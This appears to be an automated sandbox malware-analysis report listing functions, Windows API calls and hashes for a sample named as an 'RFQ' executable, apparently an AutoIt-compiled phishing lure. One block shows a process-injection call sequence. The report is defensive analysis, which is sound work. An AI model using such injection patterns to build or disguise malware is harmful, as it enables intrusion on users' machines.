                                                        • Instruction Fuzzy Hash: 90620A30A142589BEB24CFA4C851BDEB372EF58304F1091A9D54DFB390E776AE81CB59
                                                        APIs
                                                          • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                        • _free.LIBCMT ref: 004295A0
                                                          • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                          • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                          • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                          • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                          • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                          • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                        • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 3938964917-3493763051
                                                        • Opcode ID: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                                                        • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                        • Opcode Fuzzy Hash: 8f7df58051baccb1ece1a656c44b13ba1264becb6641c2440e09932015da04d6
                                                        • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: Error:
                                                        • API String ID: 4104443479-232661952
                                                        • Opcode ID: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                        • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                        • Opcode Fuzzy Hash: 0f3a33fb7be69c8e6baf3b23b87111ea2728d16161c2c78c6bada8bccab6f67e
                                                        • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                        APIs
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,0040F545,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,004A90E8,C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe,?,0040F545), ref: 0041013C
                                                          • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                          • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                          • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                          • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                          • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                        • String ID: X$pWH
                                                        • API String ID: 85490731-941433119
                                                        • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                        • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                        • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                        • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00401B11
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • _memmove.LIBCMT ref: 00401B57
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                        • String ID: @EXITCODE
                                                        • API String ID: 2734553683-3436989551
                                                        • Opcode ID: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                        • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                        • Opcode Fuzzy Hash: d09de110ff079f104ffdf991df362542016b83ce61c8771042b9fd4bbac4f926
                                                        • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                        Strings
                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                        • C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe, xrefs: 00410107
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _strcat
                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                        • API String ID: 1765576173-525010454
                                                        • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                        • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                        • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                        • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1794320848-0
                                                        • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                        • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                        • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                        • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentTerminate
                                                        • String ID:
                                                        • API String ID: 2429186680-0
                                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                        • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                        • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                        APIs
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_
                                                        • String ID:
                                                        • API String ID: 1144537725-0
                                                        • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                        • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                        • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                        • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                        APIs
                                                        • _malloc.LIBCMT ref: 0043214B
                                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                        • _malloc.LIBCMT ref: 0043215D
                                                        • _malloc.LIBCMT ref: 0043216F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _malloc$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 680241177-0
                                                        • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                        • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                        • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                        • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                        APIs
                                                        • TranslateMessage.USER32(?), ref: 00409556
                                                        • DispatchMessageW.USER32(?), ref: 00409561
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Message$DispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 4217535847-0
                                                        • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                        • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                                        • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                                        • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ClearVariant
                                                        • String ID:
                                                        • API String ID: 1473721057-0
                                                        • Opcode ID: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                                                        • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                                        • Opcode Fuzzy Hash: 06b95c7d932ab2db27afc4e2bded0b91782a390f2a18feecbc4632e93325d32e
                                                        • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                                        APIs
                                                        • __wsplitpath.LIBCMT ref: 004678F7
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast__wsplitpath_malloc
                                                        • String ID:
                                                        • API String ID: 4163294574-0
                                                        • Opcode ID: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                        • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                        • Opcode Fuzzy Hash: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                                                        • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                        APIs
                                                          • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                          • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                        • _strcat.LIBCMT ref: 0040F786
                                                          • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                          • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                        • String ID:
                                                        • API String ID: 3199840319-0
                                                        • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                        • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                        • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                                        • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                        • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FreeInfoLibraryParametersSystem
                                                        • String ID:
                                                        • API String ID: 3403648963-0
                                                        • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                        • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                        • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                        • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                        • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                        • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                        • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                        APIs
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        • __lock_file.LIBCMT ref: 00414A8D
                                                          • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                        • __fclose_nolock.LIBCMT ref: 00414A98
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                        • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                        • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                        • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                        APIs
                                                        • __lock_file.LIBCMT ref: 00415012
                                                        • __ftell_nolock.LIBCMT ref: 0041501F
                                                          • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                        • String ID:
                                                        • API String ID: 2999321469-0
                                                        • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                        • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                        • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                        • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 040B334B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040B33E1
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040B3403
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1748191586.00000000040B1000.00000040.00000020.00020000.00000000.sdmp, Offset: 040B1000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_40b1000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction ID: eb42568a335047376c159ff47f486d66166df9a943e028fcf97c709347416eb6
                                                        • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                        • Instruction Fuzzy Hash: 3912EE24E24658C6EB24DF60D8507DEB232EF68300F1090E9910DEB7A5E77A5F81CF5A
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmp
